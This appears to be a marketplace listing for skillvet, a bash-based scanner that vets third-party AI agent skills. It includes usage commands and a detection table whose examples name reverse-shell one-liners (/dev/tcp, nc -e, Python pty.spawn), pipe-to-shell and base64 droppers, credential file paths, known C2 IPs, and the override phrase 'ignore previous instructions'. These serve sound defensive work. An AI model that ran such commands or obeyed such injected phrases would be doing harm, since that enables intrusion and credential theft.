skillvetSecurity scanner for ClawHub/community skills — detects malware, credential theft, exfiltration, prompt injection, obfuscation, homograph attacks, ANSI injection, campaign-specific attack patterns, and more before you install. Use when installing skills from ClawHub or any public marketplace, reviewing third-party agent skills for safety, or vetting untrusted code before giving it to your AI agent. Triggers: install skill, audit skill, check skill, vet skill, skill security, safe install, is this skill safe.
Install via ClawdBot CLI:
clawdbot install oakencore/skillvetSecurity scanner for agent skills. 48 critical checks, 8 warning checks. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, campaign signatures from Koi Security, Bitdefender, Snyk, and 1Password ClickFix patterns.
Safe install (installs, audits, auto-removes if critical):
bash skills/skillvet/scripts/safe-install.sh <skill-slug>Audit an existing skill:
bash skills/skillvet/scripts/skill-audit.sh skills/some-skillAudit all installed skills:
for d in skills/*/; do bash skills/skillvet/scripts/skill-audit.sh "$d"; doneJSON output (for automation):
bash skills/skillvet/scripts/skill-audit.sh --json skills/some-skillSARIF output (for GitHub Code Scanning / VS Code):
bash skills/skillvet/scripts/skill-audit.sh --sarif skills/some-skillSummary mode (one-line per skill):
bash skills/skillvet/scripts/skill-audit.sh --summary skills/some-skillVerbose mode (debug which checks run and what files are scanned):
bash skills/skillvet/scripts/skill-audit.sh --verbose skills/some-skillScan remote skill without installing:
bash skills/skillvet/scripts/scan-remote.sh <skill-slug>Diff scan (only scan what changed between versions):
bash skills/skillvet/scripts/diff-scan.sh path/to/old-version path/to/new-versionExit codes: 0 clean, 1 warnings only, 2 critical findings.
| Flag | Description |
|------|-------------|
| --json | JSON output for CI/dashboards |
| --sarif | SARIF v2.1.0 output for GitHub Code Scanning |
| --summary | One-line output per skill |
| --verbose | Show which checks run and which files are scanned |
| --exclude-self | Skip scan when scanning own source directory |
| --max-file-size N | Skip files larger than N bytes |
| --max-depth N | Limit directory traversal depth |
Create a .skillvetrc file in the skill directory to disable specific checks:
# Disable check #4 (obfuscation) and #20 (shortened URLs)
disable:4
disable:20Or add inline comments to suppress individual lines:
const url = "https://bit.ly/legit-link"; // skillvet-ignoreInstall the git pre-commit hook to auto-scan skills before committing:
ln -sf ../../scripts/pre-commit-hook .git/hooks/pre-commitEach finding has a severity weight (1-10). The aggregate risk score is included in JSON, SARIF, and summary output. Higher scores indicate more dangerous patterns:
| # | Check | Example |
|---|-------|---------|
| 1 | Known exfiltration endpoints | webhook.site, ngrok.io, requestbin |
| 2 | Bulk env variable harvesting | printenv \|, ${!*@} |
| 3 | Foreign credential access | ANTHROPIC_API_KEY, TELEGRAM_BOT_TOKEN in scripts |
| 4 | Code obfuscation | base64 decode, hex escapes, dynamic code generation |
| 5 | Path traversal / sensitive files | ../../, ~/.ssh, ~/.clawdbot |
| 6 | Data exfiltration via curl/wget | curl --data, wget --post with variables |
| 7 | Reverse/bind shells | /dev/tcp/, nc -e, socat |
| 8 | .env file theft | dotenv loading in scripts (not docs) |
| 9 | Prompt injection in markdown | "ignore previous instructions" in SKILL.md |
| 10 | LLM tool exploitation | Instructions to send/email secrets |
| 11 | Agent config tampering | Write/modify AGENTS.md, SOUL.md, clawdbot.json |
| 12 | Unicode obfuscation | Zero-width chars, RTL override, bidi control chars |
| 13 | Suspicious setup commands | curl piped to bash in SKILL.md |
| 14 | Social engineering | Download external binaries, paste-and-run instructions |
| 15 | Shipped .env files | .env files (not .example) in the skill |
| 16 | Homograph URLs (Tirith) | Cyrillic i vs Latin i in hostnames |
| 17 | ANSI escape sequences (Tirith) | Terminal escape codes in code/data files |
| 18 | Punycode domains (Tirith) | xn-- prefixed IDN-encoded domains |
| 19 | Double-encoded paths (Tirith) | %25XX percent-encoding bypass |
| 20 | Shortened URLs (Tirith) | bit.ly, t.co, tinyurl.com hiding destinations |
| 21 | Pipe-to-shell | curl \| bash (HTTP and HTTPS) |
| 22 | String construction evasion | String.fromCharCode, getattr, dynamic call assembly |
| 23 | Data flow chain analysis | Same file reads secrets, encodes, AND sends network requests |
| 24 | Time bomb detection | Date.now() > timestamp, setTimeout(fn, 86400000) |
| 25 | Known C2/IOC IP blocklist | 91.92.242.30, 54.91.154.110 (known AMOS C2 servers) |
| 26 | Password-protected archives | "extract using password: openclaw" — AV evasion |
| 27 | Paste service payloads | glot.io, pastebin.com hosting malicious scripts |
| 28 | GitHub releases binary downloads | Fake prerequisites pointing to .zip/.exe on GitHub |
| 29 | Base64 pipe-to-interpreter | echo '...' \| base64 -D \| bash — primary macOS vector |
| 30 | Subprocess + network commands | hidden pipe-to-shell in Python/JS code |
| 31 | Fake URL misdirection (warning) | decoy URL before real payload |
| 32 | Process persistence + network | nohup curl ... & — backdoor with network access |
| 33 | Fake prerequisite pattern | "Prerequisites" section with sketchy external downloads |
| 34 | xattr/chmod dropper | macOS Gatekeeper bypass: download, xattr -c, chmod +x, execute |
| 35 | ClickFix download+execute chain | curl -o /tmp/x && chmod +x && ./x, open -a with downloads |
| 36 | Suspicious package sources | pip install git+https://..., npm from non-official registries |
| 37 | Staged installer pattern | Fake dependency names like openclaw-core, some-lib |
| 38 | Fake OS update social engineering | "Apple Software Update required for compatibility" |
| 39 | Known malicious ClawHub actors | zaycv, Ddoy233, Sakaen736jih, Hightower6eu references |
| 40 | Bash /dev/tcp reverse shell | bash -i >/dev/tcp/IP/PORT 0>&1 (AuthTool pattern) |
| 41 | Nohup backdoor | nohup bash -c '...' >/dev/null with network commands |
| 42 | Python reverse shell | socket.connect + dup2, pty.spawn('/bin/bash') |
| 43 | Terminal output disguise | Decoy "downloading..." message before malicious payload |
| 44 | Credential file access | Direct reads of .env, .pem, .aws/credentials |
| 45 | TMPDIR payload staging | AMOS pattern: drop malware to $TMPDIR then execute |
| 46 | GitHub raw content execution | curl raw.githubusercontent.com/... \| bash |
| 47 | Echo-encoded payloads | Long base64 strings echoed and piped to decoders |
| 48 | Typosquat skill names | clawdhub-helper, openclaw-cli, skillvet1 |
| # | Check | Example |
|---|-------|---------|
| W1 | Unknown external tool requirements | Non-standard CLI tools in install instructions |
| W2 | Subprocess execution | child_process, execSync, spawn, subprocess |
| W3 | Network requests | axios, fetch, requests imports |
| W4 | Minified/bundled files | First line >500 chars — can't audit |
| W5 | Filesystem write operations | writeFile, open('w'), fs.append |
| W6 | Insecure transport | curl -k, verify=False — TLS disabled |
| W7 | Docker untrusted registries | Non-standard image sources |
.md, .js, .ts, .tsx, .jsx, .py, .sh, .bash, .rs, .go, .rb, .c, .cpp, .json, .yaml, .yml, .toml, .txt, .env, Dockerfile, Makefile, pom.xml, .gradle.
Binary files are automatically skipped. Symlinks are followed.
Works on Linux and macOS. Unicode checks (#12, #16, #17) use grep -P where available, falling back to perl on systems without Perl-compatible regex (e.g., stock macOS). If neither is available, those checks are silently skipped.
The C2 IP blocklist in check #25 is based on known indicators from:
To update IOCs, edit the KNOWN_IPS entry in scripts/patterns.b64 (base64-encoded regex pattern).
A .github/workflows/test.yml is included — runs the test suite on both Ubuntu and macOS on push/PR.
- name: Run skillvet
run: bash scripts/skill-audit.sh --sarif skills/some-skill > results.sarif || true
- name: Upload SARIF
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: results.sarifStatic analysis only. English-centric prompt injection patterns. Minified JS is flagged but not deobfuscated. A clean scan raises the bar but doesn't guarantee safety.
The scanner flags itself when audited — its own patterns contain the strings it detects. Use --exclude-self to skip self-scanning in CI.
Generated Mar 1, 2026
Organizations using AI agent platforms like ClawHub can deploy Skillvet to automatically scan and vet skills from public marketplaces before installation. This prevents malware, credential theft, and prompt injection attacks, ensuring only safe skills are integrated into their AI agents, reducing security risks in enterprise environments.
Companies in regulated industries such as finance or healthcare use Skillvet to audit installed AI agent skills for compliance with security policies. The tool's JSON and SARIF outputs facilitate automated reporting and integration into CI/CD pipelines, helping meet regulatory requirements and internal security standards.
Development teams adopt Skillvet as part of their secure coding practices to scan custom AI agent skills for vulnerabilities like obfuscation or homograph attacks. It serves as an educational tool, highlighting common attack patterns and enabling proactive remediation during the development lifecycle.
Security operations centers utilize Skillvet to investigate suspected compromises in AI agent ecosystems. By scanning for indicators of compromise such as reverse shells or known C2 IPs, teams can quickly identify and isolate malicious skills, minimizing damage and preventing data exfiltration.
Offer Skillvet as a free open-source tool for basic scanning, with premium features like advanced threat intelligence feeds, priority support, and enterprise dashboards for a subscription fee. This model attracts individual users while monetizing organizations needing enhanced security and reporting capabilities.
Provide consulting and integration services to embed Skillvet into corporate AI agent platforms, offering custom rule sets, training, and ongoing support. This model targets large enterprises seeking tailored security solutions and compliance assistance, generating revenue through project-based fees and retainers.
Partner with AI agent marketplaces like ClawHub to offer Skillvet as a certification service for listed skills. Revenue is generated through certification fees per skill or a revenue share from marketplace transactions, ensuring only vetted skills are available and building trust among users.
💬 Integration Tip
Integrate Skillvet into CI/CD pipelines using its JSON output for automated security checks, and set up pre-commit hooks to scan skills before code commits to catch vulnerabilities early.
Set up and use 1Password CLI (op). Use when installing the CLI, enabling desktop app integration, signing in (single or multi-account), or reading/injecting/running secrets via op.
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope, and suspicious patterns.
Perform a comprehensive read-only security audit of Clawdbot's own configuration. This is a knowledge-based skill that teaches Clawdbot to identify hardening opportunities across the system. Use when user asks to "run security check", "audit clawdbot", "check security hardening", or "what vulnerabilities does my Clawdbot have". This skill uses Clawdbot's internal capabilities and file system access to inspect configuration, detect misconfigurations, and recommend remediations. It is designed to be extensible - new checks can be added by updating this skill's knowledge.
Use when reviewing code for security vulnerabilities, implementing authentication flows, auditing OWASP Top 10, configuring CORS/CSP headers, handling secrets, input validation, SQL injection prevention, XSS protection, or any security-related code review.
Security check for ClawHub skills powered by Koi. Query the Clawdex API before installing any skill to verify it's safe.
Scan Clawdbot and MCP skills for malware, spyware, crypto-miners, and malicious code patterns before you install them. Security audit tool that detects data exfiltration, system modification attempts, backdoors, and obfuscation techniques.